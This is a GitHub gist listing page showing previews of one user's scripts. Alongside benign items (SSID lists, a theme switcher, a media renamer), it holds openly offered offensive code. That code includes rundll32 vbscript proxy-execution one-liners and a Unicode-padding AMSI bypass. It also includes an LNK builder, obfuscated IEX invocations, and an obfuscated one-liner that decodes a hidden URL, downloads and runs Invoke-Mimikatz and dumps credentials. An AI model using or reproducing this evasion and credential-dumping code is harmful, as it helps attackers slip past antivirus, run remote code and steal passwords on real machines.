Bobby-Tablez bobby-tablez
@bobby-tablez
bobby-tablez / kramer_python_deobfuscator.py
Created June 11, 2025 19:36
Kramer Python Deobfuscator
# This Python script decrypts Kramer obfuscation by reversing its obfuscation and brute-forcing the key.
# Detects and uses all CPU threads, so your mileage may vary with how long it takes.
# Defaults to key ranges from 3-1000000 as generated in kramer.py
# If the key is found it will print the result to stdout
# Obfuscator: https://github.com/billythegoat356/Kramer
import sys
import marshal
import types
import dis
@bobby-tablez
bobby-tablez / DEFCON_32_SSIDs.txt
Created August 14, 2024 18:09
A list of all gathered SSIDs from the DEF CON 32 conference
# This list contains all gathered SSIDs from the DEF CON conference from Aug 8-11.
# These were gathered via a HAK5 Wifi Pineapple MK7 (2796 SSIDs in total)
#Contabilidad
#FreeStationWiFi
#Latomatina
#Moynihan-PublicWiFi
#MyBWI-Fi
#SFO FREE WIFI
#Super8
@bobby-tablez
bobby-tablez / theme.ps1
Last active April 23, 2025 21:04
Enable Dark or Light mode in Windows via PowerShell
# Modify Windows 10/11 or Server theme (Light or Dark mode). Makes registry changes which
# take effect upon reboot, or explorer.exe restart. Bypasses restriction to change theme on
# unactivated Windows installations.
#
# Usage:
# To switch to dark mode, run: .\theme.ps1 -Mode dark
# To switch to light mode, run: .\theme.ps1 -Mode light
#
# Optional: Restart the explorer.exe process:
# "Stop-Process -Name explorer -Force; Start-Sleep -Seconds 2; Start-Process explorer"
@bobby-tablez
bobby-tablez / proxy_execution_bypass_T1218.txt
Created February 25, 2024 00:37
Proxy Execution Using Rundll32.exe Vbscript
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.
# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
@bobby-tablez
bobby-tablez / lnk_builder.ps1
Last active January 24, 2024 14:35
PowerShell Shortcut LNK Builder
# Set IconLocation to app or dll to change its appearance https://www.digitalcitizen.life/where-find-most-windows-10s-native-icons/
$LinkStart = New-Object -comObject WScript.Shell;
$lnk = $LinkStart.CreateShortcut("$env:USERPROFILE\Desktop\my_new_shortcut.lnk");
$lnk.IconLocation = "$env:WINDIR\System32\notepad.exe";
$lnk.TargetPath = "cmd.exe"
$lnk.WindowStyle = 7; # 7 = minimized (1 = normal, 3 = maximized)
$lnk.Arguments = '/c calc.exe';
$lnk.Save() | Out-Null;
@bobby-tablez
bobby-tablez / rename-media.ps1
Created January 5, 2024 03:20
Batch Rename and Format Media Files
<#
Batch rename "downloaded" media files to make the file names more appealing.
Supply a directory to be scanned recursively: "rename-media.ps1 C:\path\to\media"
IE: "the.sum.of.all.fears.2002.1080p.BLAH.Text.Atmos.COOLPEOPLE.mkv" to "The Sum Of All Fears (2002).mkv"
#>
Param (
[string]$Path
)
@bobby-tablez
bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echoes a huge amount of overlapped or combined Unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever they want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
#
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
@bobby-tablez
bobby-tablez / DC31_Wifi_SSIDs.txt
Created September 8, 2023 16:33
DEF CON 31 WIFI Networks
# This list contains all SSIDs I observed during defcon 31. Includes registration, walking around the con. Captured using a Pineapple MK7
!!
#ATTHEMOXY
#Free Simon Wi-Fi
*WIFI-AIRPORT
.WynnEncoreGuest
.YUL Wi-Fi
01-STATION-INN
07edba9d8f623dc6f4d86eccf53d1280
@bobby-tablez
bobby-tablez / av_bypass_invoke_mimikatz
Last active December 23, 2022 03:23
Invoke Mimikatz - Such obfuscation, many hide, so AMSI bypass
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;@(2135,2147,2147,2143,2146,2089,2078,2078,2145,2128,2150,2077,2134,2136,2147,2135,2148,2129,2148,2146,2132,2145,2130,2142,2141,2147,2132,2141,2147,2077,2130,2142,2140,2078,2097,2098,2076,2114,2100,2098,2116,2113,2104,2115,2120,2078,2100,2140,2143,2136,2145,2132,2078,2140,2128,2136,2141,2078,2132,2140,2143,2136,2145,2132,2078,2146,2132,2145,2149,2132,2145,2078,2131,2128,2147,2128,2078,2140,2142,2131,2148,2139,2132,2126,2146,2142,2148,2145,2130,2132,2078,2130,2145,2132,2131,2132,2141,2147,2136,2128,2139,2146,2078,2104,2141,2149,2142,2138,2132,2076,2108,2136,2140,2136,2138,2128,2147,2153,2077,2143,2146,2080)|%{$sr=$sr+[char]($_-2031)};$cue='rl';$fis = Get-Random 483;.(gal n?[?al]) $fis cu$cue;.(&(&(gal g?l) g?[?l]) ?e[?x])(& $fis -useb $sr);&("{0}{3}{4}{2}{1}" -f 'In','z','ikat','voke-','Mim') -DumpCreds
@bobby-tablez
bobby-tablez / IEX_Obfuscated.ps1
Created September 28, 2022 16:30
A list of obscure obfuscated PowerShell invoke expressions
# use at your own risk
$sk="xjeji";$sl=($sk[4,2,0]-Join"");.($sl)
.((RVpa "\???????\\*2\*POO*\\*river?\?6*").PATh[4,15,34]-JOin'')
.(g`cm ?e[?x])
.(ga`l i?[?x])